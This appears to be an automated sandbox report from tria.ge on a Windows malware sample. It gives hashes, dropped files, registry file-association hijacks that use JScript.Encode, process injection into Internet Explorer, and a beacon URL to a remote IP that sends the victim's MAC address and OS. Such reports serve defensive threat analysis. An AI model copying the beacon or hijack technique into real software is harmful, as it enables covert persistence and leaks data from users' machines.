Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
192s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
20/10/2022, 04:54
Behavioral task
behavioral1
Sample
93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe
Resource
win10v2004-20220812-en
General
-
Target
93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe
-
Size
143KB
-
MD5
4131b1e0dab8aa46d82c512c723e85d5
-
SHA1
79ffeb0a5b4403d220c3ff3cf7c3ee0f617fdac6
-
SHA256
93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550
-
SHA512
a93a4071919f9f3aa71ab58fbd62edac677f7c01c0ebc65fea5fb33a780f38ed1bdeae29842ae1d3231aa9518c68717b6f13e1e16ff15275d6c2a726654e82b5
-
SSDEEP
3072:rgN+NspuUdzh5vaBAzmeu2ZN/Lh2uOhIAsdxn6sM0TZMl9V:sN+iuUdzh5vaBAz5N9mhIAsdxn6sM0Tc
Malware Config
Signatures
-
resource yara_rule behavioral1/memory/1372-55-0x0000000000400000-0x0000000000426000-memory.dmp upx behavioral1/memory/1372-56-0x0000000000400000-0x0000000000426000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Thunder\Update.exe 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe File opened for modification C:\Program Files\Thunder\Update.exe 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\WINDOWS\Downloaded Program Files\Update.exe 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Frist 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00fef2ed93e4d801 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000062e6ef0d45f4454ab79548c962d74cdf0000000002000000000010660000000100002000000089e9a47c7278669b13c300134bea3c1e89e1cfd990d67ccc7321deff5a3bd06e000000000e80000000020000200000005aa7b0f141650df0d780a4b466e65b6e6b8119e33219a93d4d5502a445cfcc9d200000007e1ce24714b2b02df7111f6923c4f29f8647a008d2224c5f14f7c4c5dc76f326400000007c8eeca7a82153b103f140655419af26859f413796b91fb8636dd9d8ce64a3b8578267c1607daf4fcfabfbe8bf624a576fbc4ed54de656496986e869a53df155 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Layout = 130000000000000000000000300000001400000016000000010000000007000080010000030000000103000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBarLayout = 110000005c00000000000000340000001f0000006e00000001000000a0060000a00f000005000000220400002600000002000000a1060000a00f000004000000a10000000f02000003000000a10200003b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EE432921-5086-11ED-8B55-6651945CA213} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "373042578" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000062e6ef0d45f4454ab79548c962d74cdf00000000020000000000106600000001000020000000facb9c96b477bef5b4e5e804031e2ee760cd722143b8d0f4139cb57cc198d76b000000000e8000000002000020000000c3049f9a25f7954f6210ae8999a49e91bb782a4fd2a4607c0a84284b055befa29000000036f07ff531ad63389b3a7ceedaa65974f3705655c8a6ba3ba759caaf59d5a3120b5374eae7329e34fe3005c22963c088fe65055ff1f107bc16ce65af6323f2d0868fd4190fd36510f5dee8549609173df8954230b3c82b1a47e6dc45a1d0590427f249302fc3c977e37ae04860bfc5c9ecadb8f8e18c019f8e9f4f5f888c659d5c3a5bc4416857dfea50cc5265d2ec5e40000000207e1dc6f2a6cc436ffd059628553a64027ee3fe9d389efd7d9bf626bfe0b46fd2b1f5dbd8489525c25cf1a31820811bf7ad4761ba85f0fe8c598b6ff97ca830 iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\ScriptEngine 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open\command 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\DefaultIcon\ = "C:\\WINDOWS\\Downloaded Program Files\\game.ico" 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open\command\ = "C:\\Program Files\\Thunder\\Update.exe \"%1\" %*" 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\ScriptEngine\ = "JScript.Encode" 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\ScriptEngine 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\DefaultIcon\ = "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\ScriptEngine\ = "JScript.Encode" 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1224 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1224 iexplore.exe 1224 iexplore.exe 776 IEXPLORE.EXE 776 IEXPLORE.EXE 776 IEXPLORE.EXE 776 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1372 wrote to memory of 1224 1372 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe 28 PID 1372 wrote to memory of 1224 1372 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe 28 PID 1372 wrote to memory of 1224 1372 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe 28 PID 1372 wrote to memory of 1224 1372 93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe 28 PID 1224 wrote to memory of 776 1224 iexplore.exe 30 PID 1224 wrote to memory of 776 1224 iexplore.exe 30 PID 1224 wrote to memory of 776 1224 iexplore.exe 30 PID 1224 wrote to memory of 776 1224 iexplore.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe"C:\Users\Admin\AppData\Local\Temp\93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a550.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=66-51-94-5c-a2-13&os=Microsoft Windows XP&flag=53a30cc588b554864ff7b5de6e01bf51&user=93acca25ab8bf2d407d8b19c31be742a4989ed7ff241826df6cd6afe91d6a5502⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1224 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:776
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
608B
MD563db11344b55b773bd5c190b0160d8e7
SHA1342b017ece9b307bb48b2d558811d56a74b93101
SHA25644d83b02b81259d4e74e6f7e1091d176b99520969e742beb161bab96127bbfa0
SHA512ecd9a78aad0fb65fe37fb7c7b0d4dd26f83b3b8b51d435cf53cb9fc4af284a3170f0f25b1c142ad7eb5c082ba68de4a892320fda8bd9ca913305fb5fe54a27de